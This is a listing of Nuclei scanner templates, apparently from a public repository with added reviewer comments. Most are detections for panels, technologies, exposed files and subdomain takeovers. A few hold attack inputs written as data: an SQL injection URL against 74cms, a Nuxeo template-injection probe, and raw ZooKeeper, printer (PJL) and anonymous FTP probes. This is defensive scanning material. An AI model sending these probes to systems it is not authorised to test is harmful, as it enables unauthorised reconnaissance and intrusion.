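  author: impramodsargar
  severity: info
  tags: panel,synnefo

requests:
  - method: GET
    path:
      - "{{BaseURL}}/synnefoclient/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Synnefo Admin'

      - type: status
        status:
          - 200
---
# --- /exposed-panels/virtual-ema-detect.yaml ---
id: virtual-ema-detect

info:
  name: Virtual EMS Panel Detection
  author: iamthefrogy
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/virtualems/Login.aspx"
      - "{{BaseURL}}/VirtualEms/Login.aspx"

    matchers:
      # NOTE(review): these words are generic login-page vocabulary; the AND
      # narrows it, but a product-specific string (or a status check) would
      # make the fingerprint far more reliable. Verify hits manually.
      - type: word
        words:
          - "Login"
          - "Browse"
          - "Welcome Guest"
        condition: and
---
# --- /exposures/configs/exposed-hg.yaml ---
id: exposed-hg

info:
  name: Exposed HG Directory
  author: daffainfo
  severity: low
  tags: config,exposure

requests:
  - method: GET
    path:
      # .hg/hgrc carries the remote path, which may embed credentials, and a
      # readable .hg/ often means the whole repository is downloadable.
      - "{{BaseURL}}/.hg/hgrc"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[paths]"
          - "default"
        condition: and

      - type: status
        status:
          - 200
---
# --- /exposures/files/phpunit.yaml ---
id: phpunit

info:
  name: phpunit.xml file disclosure
  author: pikpikcu
  severity: info
  tags: exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/phpunit.xml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          # NOTE(review): the marker is empty in this rendering (the XML tag
          # was stripped on export) and a second marker line is missing. An
          # empty word is always true, so this currently reports any 200 at
          # /phpunit.xml. Restore the element-name markers from upstream.
          - ""
        condition: and

      - type: status
        status:
          - 200
---
# --- /iot/mobotix-guest-camera.yaml ---
id: mobotix-guest-camera

info:
  name: MOBOTIX Guest Camera
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6848
  tags: iot

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cgi-bin/guestimage.html'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'MOBOTIX'
      - type: status
        status:
          - 200
---
# --- /misconfiguration/elasticsearch.yaml ---
id: elasticsearch

info:
  name: ElasticSearch Information Disclosure
  author: Shine
  severity: low
  tags: elastic,unauth

requests:
  - method: GET
    path:
      - '{{BaseURL}}/_cat/indices?v'
      # Only the search endpoint returns the "took" key matched below; an
      # unauthenticated 200 here means index contents are readable.
      - '{{BaseURL}}/_all/_search'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"took":'
      - type: status
        status:
          - 200
---
# --- /network/exposed-zookeeper.yaml ---
id: exposed-zookeeper

info:
  name: ZooKeeper Unauth Server
  author: pdteam
  severity: high
  reference: https://zookeeper.apache.org/security.html
  tags: network,zookeeper

network:
  - inputs:
      # "envi" four-letter-word command returns the server's environment
      # (version, host, Java/OS details); answering it unauthenticated shows
      # the admin commands are reachable.
      - data: "envi\r\nquit\r\n"

    host:
      - "{{Hostname}}"
      - "{{Hostname}}:2181"
    read-size: 2048

    matchers:
      - type: word
        words:
          - "zookeeper.version"
---
# --- /takeovers/canny-takeover.yaml ---
id: canny-takeover

info:
  name: canny takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'Company Not Found'
          - 'There is no such company. Did you enter the right URL?'
        condition: and
---
# --- /takeovers/cargo-takeover.yaml ---
id: cargo-takeover

info:
  name: cargo takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel."
---
# --- /takeovers/helprace-takeover.yaml ---
id: helprace-takeover

info:
  name: helprace takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Alias not configured!"
          - "Admin of this Helprace account needs to set up domain alias"
---
# --- /technologies/dotclear-detect.yaml ---
id: dotclear-detect

info:
  name: Dotclear Detect
  author: pikpikcu
  severity: info
  tags: tech,dotclear

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dc2/admin/auth.php"
      - "{{BaseURL}}/auth.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Dotclear"
      - type: status
        status:
          - 200
---
# --- /technologies/druid-detect.yaml ---
id: druid-detect

info:
  name: Druid monitor Detect
  author: pikpikcu
  severity: info
  tags: tech,druid

requests:
  - method: GET
    path:
      - "{{BaseURL}}/druid/login.html"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "druid monitor"

      - type: status
        status:
          - 200
---
# --- /technologies/froxlor-detect.yaml ---
id: froxlor-detect

info:
  name: Froxlor Detect
  author: pikpikcu
  severity: info
  tags: tech,froxlor

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Froxlor Server Management Panel"

      - type: status
        status:
          - 200
# --- /technologies/influxdb-detect.yaml ---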
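id: influxdb-detect

info:
  name: InfluxDB Detect
  author: pikpikcu
  severity: info
  tags: tech,influxdb

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      # Legacy built-in admin UI (removed in later 1.x releases); a hit means
      # an old InfluxDB with its web console on the root path.
      - type: word
        part: body
        words:
          - "InfluxDB - Admin Interface"

      - type: status
        status:
          - 200
---
# --- /technologies/oneblog-detect.yaml ---
id: oneblog-detect

info:
  name: OneBlog Detect
  author: pikpikcu
  severity: info
  tags: tech,oneblog

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passport/login/"

    matchers-condition: and
    matchers:
      # Chinese title of the OneBlog admin back-end login page.
      - type: word
        part: body
        words:
          - "OneBlog开源博客后台管理系统"

      - type: status
        status:
          - 200
---
# --- /vulnerabilities/wordpress/wp-license-file.yaml ---
id: wp-license-file

info:
  name: WordPress license file disclosure
  author: yashgoti
  severity: info
  tags: wordpress

requests:
  - method: GET
    path:
      - "{{BaseURL}}/license.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WordPress - Web publishing software"

      - type: status
        status:
          - 200
---
# --- /exposed-panels/oki-data.yaml ---
id: oki-data-corporation

info:
  name: Oki Data Corporation
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/5937
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/status.htm'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Oki Data Corporation'
      - type: status
        status:
          - 200
---
# --- /exposed-panels/plesk-obsidian.yaml ---
id: plesk-obsidian

info:
  name: Plesk Obsidian
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6951
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login_up.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Plesk Obsidian'

      - type: status
        status:
          - 200
---
# --- /exposed-panels/plesk-onyx.yaml ---
id: plesk-onyx-login

info:
  name: Plesk Onyx login portal
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6501
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login_up.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Plesk Onyx'

      - type: status
        status:
          - 200
---
# --- /exposed-panels/total-web.yaml ---
id: total-web-login

info:
  name: Total Web Solution
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6811
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Total Web Solutions'
      - type: status
        status:
          - 200
---
# --- /exposed-panels/web-service-panel.yaml ---
id: web-service-panel

info:
  name: WEB SERVICE Panel
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/7116
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      # NOTE(review): 'WEB SERVICE' on a 200 root page is a very weak
      # fingerprint (the dork in the reference is title-based); expect false
      # positives and confirm hits by hand.
      - type: word
        words:
          - 'WEB SERVICE'
      - type: status
        status:
          - 200
---
# --- /exposures/configs/xprober-service.yaml ---
id: xprober-service

info:
  name: X Prober server information leakage
  author: pdteam
  severity: low
  tags: config,exposure
  reference: https://twitter.com/bugbounty_tips/status/1339984643517423616

requests:
  - method: GET
    path:
      # X Prober is a PHP server-info probe; left deployed it reveals PHP,
      # OS and network details of the host.
      - "{{BaseURL}}/xprober.php"
    matchers:
      - type: word
        words:
          - '"appName":"X Prober"'
          - 'X Prober'
        condition: and
---
# --- /iot/epmp-login.yaml ---
id: epmp-login

info:
  name: ePMP 2000 Login
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6826
  tags: iot,panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>ePMP'

      - type: status
        status:
          - 200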
-------------------------------------------------------------------------------- /iot/internet-service.yaml: -------------------------------------------------------------------------------- 1 | id: internet-service 2 | 3 | info: 4 | name: Internet Services 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/5948 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/default.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Internet Services' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /takeovers/heroku-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: heroku-takeover 2 | 3 | info: 4 | name: heroku takeover detection 5 | author: 0xPrial,pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "herokucdn.com/error-pages/no-such-app.html" 19 | - "No such app" 20 | condition: and -------------------------------------------------------------------------------- /technologies/bigbluebutton-detect.yaml: -------------------------------------------------------------------------------- 1 | id: bigbluebutton-detect 2 | 3 | info: 4 | name: BigBlueButton Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,bigbluebutton 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "BigBlueButton" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/crush-ftp-detect.yaml: 
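id: crush-ftp-detect

info:
  name: Crush FTP
  author: pussycat0x
  severity: info
  tags: tech,ftp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/login.html"

    redirects: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "CrushFTP WebInterface"
      - type: status
        status:
          - 200
---
# --- /exposed-panels/couchdb-exposure.yaml ---
id: couchdb-exposure

info:
  name: couchdb exposure
  author: organiccrap
  severity: low
  tags: panel

requests:
  - method: GET
    path:
      # _all_dbs enumerates every database; a 200 here means the listing is
      # served without authentication.
      - '{{BaseURL}}/_all_dbs'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - CouchDB/
          - Erlang OTP/
        condition: and

      - type: status
        status:
          - 200
---
# --- /exposed-panels/globalprotect-panel.yaml ---
id: globalprotect-panel

info:
  name: PaloAlto Networks GlobalProtect Panel
  author: organiccrap
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/global-protect/login.esp"
      # /sslmgr answers "Invalid parameters" on GlobalProtect gateways.
      - "{{BaseURL}}/sslmgr"

    matchers:
      - type: word
        words:
          - "GlobalProtect Portal"
          - "Invalid parameters"
        condition: or
---
# --- /exposed-panels/remote-ui-login.yaml ---
id: remote-ui-login

info:
  name: Remote UI Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6815
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login.html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'System Manager ID:'
      - type: status
        status:
          - 200
---
# --- /exposed-panels/vigor-login.yaml ---
id: vigor-login

info:
  name: Vigor Login Page
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6610
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/weblogin.htm'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Vigor Login Page'
      - type: status
        status:
          - 200
---
# --- /technologies/default-windows-server-page.yaml ---
id: default-windows-server-page

info:
  name: IIS Windows Server Default Page
  author: dhiyaneshDk
  severity: info
  tags: tech,windows,iis
  reference: https://www.shodan.io/search?query=http.title%3A%22IIS+Windows+Server%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        part: body
        words:
          - "IIS Windows Server"
---
# --- /technologies/voipmonitor-detect.yaml ---
id: voipmonitor-detect

info:
  name: VoipMonitor detect
  author: Yanyun
  severity: info
  tags: tech,voipmonitor

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'share.voipmonitor.org'
          - 'VoIPmonitor'
        condition: and
---
# --- /cves/2018/CVE-2018-16341.yaml ---
id: CVE-2018-16341

info:
  name: Nuxeo Authentication Bypass Remote Code Execution
  author: madrobot
  severity: high
  description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16341
  tags: cve,cve2018,nuxeo,ssti,rce

requests:
  - method: GET
    path:
      # Harmless arithmetic probe: the template engine evaluating
      # ${31333333330+7} to 31333333337 proves pre-auth expression injection
      # without executing anything on the target.
      - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
    matchers:
      - type: word
        part: body
        words:
          - "31333333337"
---
# --- /exposed-panels/blue-iris-login.yaml ---
id: blue-iris-login

info:
  name: Blue Iris Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6814
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login.htm'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Blue Iris Login'
      - type: status
        status:
          - 200
---
# --- /exposed-panels/grafana-detect.yaml ---
id: grafana-detect

info:
  name: Grafana panel detect
  author: organiccrap
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/login"
    matchers:
      - type: word
        part: body
        words:
          - "Grafana"
    extractors:
      # Captures the version shown on the login page for triage against
      # known Grafana advisories.
      - type: regex
        part: body
        group: 1
        regex:
          - 'Grafana ([v0-9.]+)'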
--------------------------------------------------------------------------------
/exposed-panels/weave-scope-dashboard-detect.yaml:
--------------------------------------------------------------------------------
# Panel detection: the root page body must contain all three markers (condition: and),
# including the CSRF token placeholder strings present in the dashboard HTML.
# No status matcher is applied.
id: weave-scope-dashboard-detect

info:
  name: Weave Scope Dashboard
  author: e_schultze_
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Weave Scope"
          - "__WEAVEWORKS_CSRF_TOKEN"
          - "__CSRF_TOKEN_PLACEHOLDER__"
        condition: and
        part: body

--------------------------------------------------------------------------------
/exposures/configs/exposed-vscode.yaml:
--------------------------------------------------------------------------------
# Exposure check: a directory listing for /.vscode/ ("Index of /.vscode" in the body).
# Defender fix: disable autoindex for dot-directories or exclude them from the web root.
id: exposed-vscode

info:
  name: Exposed VSCode Folders
  author: aashiq
  severity: low
  description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
  tags: vscode,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/.vscode/"
    matchers:
      - type: word
        words:
          - "Index of /.vscode"
        part: body

--------------------------------------------------------------------------------
/exposures/configs/web-config.yaml:
--------------------------------------------------------------------------------
# Exposure check for a readable /web.config (HTTP 200).
# NOTE(review): both word entries are empty in this listing, most likely angle-bracketed
# XML tags stripped when the page was rendered. As written, empty words match every
# 200 response to /web.config, so verify the entries against the upstream file.
id: web-config
info:
  name: Web Config file
  author: Yash Anand @yashanand155
  severity: info
  tags: config,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/web.config'

    matchers-condition: and
    matchers:
      - type: word
        words:
          -
          -
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/iot/hp-laserjet-detect.yaml:
--------------------------------------------------------------------------------
# IoT detection: the printer's /SSI/index.htm containing 'HP LaserJet Professional'
# with HTTP 200. A hit means the printer's web UI is reachable from the scanning host.
id: hp-laserjet-detect

info:
  name: HP LaserJet
  author: dhiyaneshDk
  severity: low
  reference: https://www.exploit-db.com/ghdb/6459
  tags: iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/SSI/index.htm"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'HP LaserJet Professional'
        part: body
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/miscellaneous/xml-schema-detect.yaml:
--------------------------------------------------------------------------------
# Looks for an exposed /schema path (follows redirects) whose body mentions both
# ".xsd" and "Schemas", with HTTP 200.
# NOTE(review): the "misc" tag is in the repository's .nuclei-ignore tag list, so this
# template is skipped on default runs unless the tag is requested explicitly.
id: xml-schema-detect
info:
  name: XML Schema Detection
  author: alph4byt3
  severity: info
  tags: misc

requests:
  - method: GET
    path:
      - "{{BaseURL}}/schema"

    matchers-condition: and
    redirects: true
    matchers:
      - type: word
        words:
          - ".xsd"
          - "Schemas"
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/misconfiguration/apc-info.yaml:
--------------------------------------------------------------------------------
# Information-leak check: the APCu status page (apc.php) reachable at either path;
# any one of the three page headings matches (condition: or). No status matcher.
# Defender fix: remove apc.php from production or put it behind authentication.
# NOTE(review): the template id ("apcu-service") does not match the file name
# ("apc-info"); harmless at runtime but confusing when filtering by id.
id: apcu-service

info:
  name: APCu service information leakage
  author: koti2
  severity: low
  tags: config

requests:
  - method: GET
    path:
      - "{{BaseURL}}/apc/apc.php"
      - "{{BaseURL}}/apc.php"
    matchers:
      - type: word
        words:
          - "APCu Version Information"
          - "General Cache Information"
          - "Detailed Memory Usage and Fragmentation"
        condition: or

--------------------------------------------------------------------------------
/misconfiguration/tcpconfig.yaml:
--------------------------------------------------------------------------------
# Exposure check: /tcpconfig.html containing "TCP/IP Configuration" with HTTP 200.
id: tcpconfig

info:
  name: TCP Config Information Exposed
  author: dhiyaneshDK
  severity: low
  reference: https://www.exploit-db.com/ghdb/6782
  tags: logs

requests:
  - method: GET
    path:
      - "{{BaseURL}}/tcpconfig.html"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TCP/IP Configuration"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/network/printers-info-leak.yaml:
--------------------------------------------------------------------------------
# Network (non-HTTP) check: a PJL INFO STATUS query is sent to TCP/9100 and the reply
# must contain both "CODE=" and "PJL INFO STATUS". A hit means the raw print port answers
# unauthenticated from the scanning host; restrict 9100 to the print server/VLAN.
id: printers-info-leak

info:
  name: Unauthorized Printer Access
  author: pussycat0x
  severity: info
  tags: network,iot
  reference: https://book.hacktricks.xyz/pentesting/9100-pjl
network:
  - inputs:
      - data: "@PJL INFO STATUS\n"
    host:
      - "{{Hostname}}:9100"
    matchers:
      - type: word
        words:
          - "CODE="
          - "PJL INFO STATUS"
        condition: and

--------------------------------------------------------------------------------
/takeovers/github-takeover.yaml:
--------------------------------------------------------------------------------
# Dangling-DNS check for GitHub Pages. No `condition` is set on the word matcher, so
# either error string on the root page is enough (contrast heroku-takeover, which
# requires both of its strings).
id: github-takeover

info:
  name: github takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "There isn't a GitHub Pages site here."
          - "For root URLs (like http://example.com/) you must provide an index.html file"

--------------------------------------------------------------------------------
/takeovers/tumblr-takeover.yaml:
--------------------------------------------------------------------------------
# Dangling-DNS check for Tumblr: both unclaimed-blog phrases must be present
# (condition: and). Word values are unquoted plain scalars; the apostrophes are
# mid-string, so YAML parses them literally.
id: tumblr-takeover

info:
  name: tumblr takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - Whatever you were looking for doesn't currently exist at this address.
          - There's nothing here.
        condition: and

--------------------------------------------------------------------------------
/technologies/artica-web-proxy-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: the Artica admin login page (/fw.login.php) with HTTP 200.
id: artica-web-proxy-detect

info:
  name: Artica Web Proxy Detect
  author: dwisiswant0
  severity: info
  tags: tech,artica,proxy

requests:
  - method: GET
    path:
      - "{{BaseURL}}/fw.login.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Welcome to the Artica Web Administration Interface"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/fanruanoa-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: either ReportServer path returning 200 with the
# 'DeploySuccess._init' marker in the response.
id: fanruanoa-detect

info:
  name: FanRuanOA-detect
  author: YanYun
  severity: info
  tags: oa,tech,dotnet,fanruan

requests:
  - method: GET

    path:
      - "{{BaseURL}}/WebReport/ReportServer"
      - "{{BaseURL}}/ReportServer"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'DeploySuccess._init'
--------------------------------------------------------------------------------
/technologies/herokuapp-detect.yaml:
--------------------------------------------------------------------------------
# Extractor-only template: no matcher, it just collects every *.herokuapp.com host name
# found in the root page body. Extracted names are candidates for the takeover checks
# (see info.description); they are not findings by themselves.
id: herokuapp-detect

info:
  name: Detect websites using Herokuapp endpoints
  author: alifathi-h1
  severity: info
  tags: heroku,tech
  description: Detected endpoints might be vulnerable to subdomain takeover or disclose sensitive info

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - "[a-z0-9.-]+\\.herokuapp\\.com"

--------------------------------------------------------------------------------
/technologies/jaspersoft-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: the JasperReports login page; any one of the three
# strings matches (condition: or). No status matcher.
id: jaspersoft-detect

info:
  name: Jaspersoft detected
  author: koti2
  severity: info
  tags: tech,jaspersoft

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jasperserver/login.html?error=1"
    matchers:
      - type: word
        words:
          - "TIBCO Jaspersoft: Login"
          - "Could not login to JasperReports Server"
          - "About TIBCO JasperReports Server"
        condition: or

--------------------------------------------------------------------------------
/technologies/jitsi-meet.yaml:
--------------------------------------------------------------------------------
# Technology detection: root page containing "Jitsi Meet" with HTTP 200.
id: jitsi-meet

info:
  name: Jitsi Meet Page
  author: dhiyaneshDK
  severity: info
  reference: https://www.shodan.io/search?query=http.title%3A%22Jitsi+Meet%22
  tags: tech

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Jitsi Meet"
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/magmi-detect.yaml:
--------------------------------------------------------------------------------
# Plugin detection: a static MAGMI JavaScript asset is fetched and must contain
# "magmi_multifield" with HTTP 200. A hit means the importer is deployed under the
# web root; defenders should remove it or restrict access when not actively importing.
id: magmi-detect

info:
  name: MAGMI (Magento Mass Importer) Plugin Detect
  author: dwisiswant0
  severity: info
  tags: magento,magmi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/magmi/web/js/magmi_utils.js"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "magmi_multifield"
        part: body

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/thinkcmf-detection.yaml:
--------------------------------------------------------------------------------
# Technology detection via the X-Powered-By response header on the root page (HTTP 200).
# `condition: and` on a single word is redundant but harmless.
id: thinkcmf-detection

info:
  name: ThinkCMF Detection
  author: pikpikcu
  severity: info
  tags: thinkcmf

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "X-Powered-By: ThinkCMF"
        part: header
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml:
--------------------------------------------------------------------------------
# Misconfiguration check: the root page renders the "Dashboard [Jenkins]" title with
# HTTP 200 for an unauthenticated request. Defender fix: enable a security realm and
# remove anonymous read access.
# NOTE(review): the id/file name spelling ("unaunthenticated-jenkin") is a typo, but it is
# the identifier users filter on, so it is left unchanged here.
id: unaunthenticated-jenkin

info:
  name: Unauthenticated Jenkins Dashboard
  author: dhiyaneshDK
  severity: high
  tags: jenkins

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - Dashboard [Jenkins]
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/vulnerabilities/other/74cms-sqli.yaml:
--------------------------------------------------------------------------------
# SQL injection check: the response body must contain the MD5 of a constant that the
# injected expression computes, so a hit means user input reached the query unescaped.
# NOTE(review): info has no reference/description; add the advisory or commit that
# documents this issue so triage can confirm affected versions and the fix.
id: 74cms-sqli
info:
  author: princechaddha
  name: 74cms Sql Injection
  severity: high
  tags: 74cms,sqli

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'

    matchers:
      - type: word
        words:
          - "e807f1fcf82d132f9bb018ca6738a19f"
        part: body

--------------------------------------------------------------------------------
/workflows/worksite-takeover-workflow.yaml:
--------------------------------------------------------------------------------
# Workflow: the DNS detection template gates the HTTP takeover template, so the
# takeover check only runs on hosts the DNS template matched.
id: worksite-takeover-workflow

info:
  name: Worksite Takeover Workflow
  author: pdteam
  description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover.
  reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites

workflows:
  - template: dns/worksites-detection.yaml
    subtemplates:
      - template: takeovers/worksites-takeover.yaml

--------------------------------------------------------------------------------
/.nuclei-ignore:
--------------------------------------------------------------------------------
# ==| Nuclei Templates Ignore list |==
# ====================================
#
# This is the default list of tags and files to be excluded from a default nuclei scan.
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion

# tags is a list of tags to ignore execution for
# unless asked for by the user.

tags:
  - "fuzz"
  - "dos"
  - "misc"

# files is a list of files to ignore template execution
# unless asked for by the user.
# NOTE(review): the `files:` entries are not present in this listing; the file appears
# to be cut off here. Check the upstream file for the full list.
--------------------------------------------------------------------------------
/exposures/files/keycloak-json.yaml:
--------------------------------------------------------------------------------
# Exposure check: /keycloak.json served with 200 and containing the adapter keys
# realm, resource and auth-server-url (condition: and). The adapter file may also
# carry client credentials, so treat a hit as a potential secret exposure and review
# the file contents rather than only its presence.
id: keycloak-json
info:
  name: Keycloak Json File
  author: oppsec
  severity: info
  tags: exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/keycloak.json"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - realm
          - resource
          - auth-server-url
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/iot/liveview-axis-camera.yaml:
--------------------------------------------------------------------------------
# IoT detection: the AXIS camera live-view page with HTTP 200. A hit means the camera
# web UI is reachable from the scanning host without being challenged on this path.
id: liveview-axis-camera

info:
  name: Live view AXIS Network Camera
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6843
  tags: iot

requests:
  - method: GET
    path:
      - '{{BaseURL}}/view/viewer_index.shtml'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Live view - AXIS'
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/misconfiguration/cgi-test-page.yaml:
--------------------------------------------------------------------------------
# Misconfiguration check: a CGI test script that echoes request environment variables
# (HTTP_ACCEPT, HTTP_ACCEPT_ENCODING). Defender fix: remove sample/test CGI scripts
# from production hosts.
id: cgi-test-page
info:
  name: CGI Test page
  author: YASH ANAND @yashanand155
  severity: info
  tags: cgi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/test/test.cgi"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - HTTP_ACCEPT
          - HTTP_ACCEPT_ENCODING
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/network/ftp-default-credentials.yaml:
--------------------------------------------------------------------------------
# Network check: an anonymous FTP login is attempted and the reply must contain both
# the 230 code and "Anonymous user logged in". Defender fix: disable anonymous FTP
# or restrict it to a read-only, isolated share.
# NOTE(review): the second host entry is a bare {{Hostname}} with no port; presumably
# it covers inputs that already include a port — confirm that is the intent.
id: ftp-default-credentials

info:
  name: FTP Service with anonymous Login
  author: pussycat0x
  severity: info
  tags: network,ftp,default-login

network:

  - inputs:
      - data: "USER anonymous\r\nPASS anonymous\r\n"
    host:
      - "{{Hostname}}:21"
      - "{{Hostname}}"

    matchers:
      - type: word
        words:
          - "230"
          - "Anonymous user logged in"
        condition: and

